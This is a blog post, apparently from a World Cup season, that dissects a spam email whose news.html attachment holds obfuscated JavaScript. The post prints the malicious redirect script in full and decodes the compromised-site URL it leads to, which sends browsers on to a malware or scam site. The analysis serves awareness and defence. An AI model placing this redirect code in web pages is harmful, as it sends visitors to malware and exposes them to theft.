|
WARNING: DO NOT CLICK ANY LINKS IN THE BODY OF THIS POST
Ed. Since time of writing the post mentioned website has removed the files uploaded by the hackers running this scam. Please be aware that this is not the only site that has been exploited in this way, so please be careful.
Hello, are you enjoying the World Cup yet? Well make sure it doesn't turn sour. As with all major events in recent times spam emails are filling inbox's & junk boxes world wide. I thought I would take time to dissect one that seems to be hammering my junk filter at the moment. So lets take a look at the email.
Now with the big red strip across the top from the Mail provider you would be forgiven for think you would need to be an idiot to open this, but alas how many people open Spam and click the links? Curiosity killed the cat & it is the same for users. Especially with the promise of some sort of gossip or reward.
Any way the email instructs you to open news.html which you would expect includes the "bad news", but in fact takes you to an exploited/hacked website. How does it do this? It uses a bit of Javascript to redirect your browser.
<script type='text/javascript'>function dX(){};var h=new Date();dX.prototype = {f : function() {var u=function(){};var uY=new Date();var o="";var k=document;
var oE=function(){};var l='';this.i=33457;var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];var w=function(){};var p=false;this.pP=false;this.s='';kV['hGrGe
>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');var iK="iK";pK=
'';this.d="d";uM="";}};this.dK="";var fG=new dX(); var dR="dR";fG.f();hJ=false;</script>
Now if you look at the code, it will be hard to spot the web address unless you know what your looking for. Basically the javascript deletes certain characters in "hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ" to give the web address http:// advancedwoodtech. com/ xnuej/ z.htm (spaces added to avoid reader clicking link) which then creates an iFrame (which means that the web address may show what you expect, but the page will be a totally different website altogether) in your browser which opens a .ru (Russian) website which will be hosting malware and/or some scam. By the time the user realizes they have been mislead the damage will have been done. Unfortunately not all mail providers will mark these mails as Spam nor will all possible exploits by the end site be blocked with AntiVirus/Malware software (Ed. Not that most users will have up-to-date security software installed or even running, after all "that stupid firewall will not let me play games on facebook") & of course there is the possibility of a scam which may convince the user to hand over personal details & maybe even some cash.
So there you go, now you know how an attachment in an email can lead to an infected PC, loss of cash & even I.D. theft. Although I have explained in brief how an email attack can function please be aware that email is not the only way these people can run scams. Social Media (facebook, myspace, twitter) websites, hacked websites & spoof websites are all mediums scammers are actively using to rope in unwary users.
|
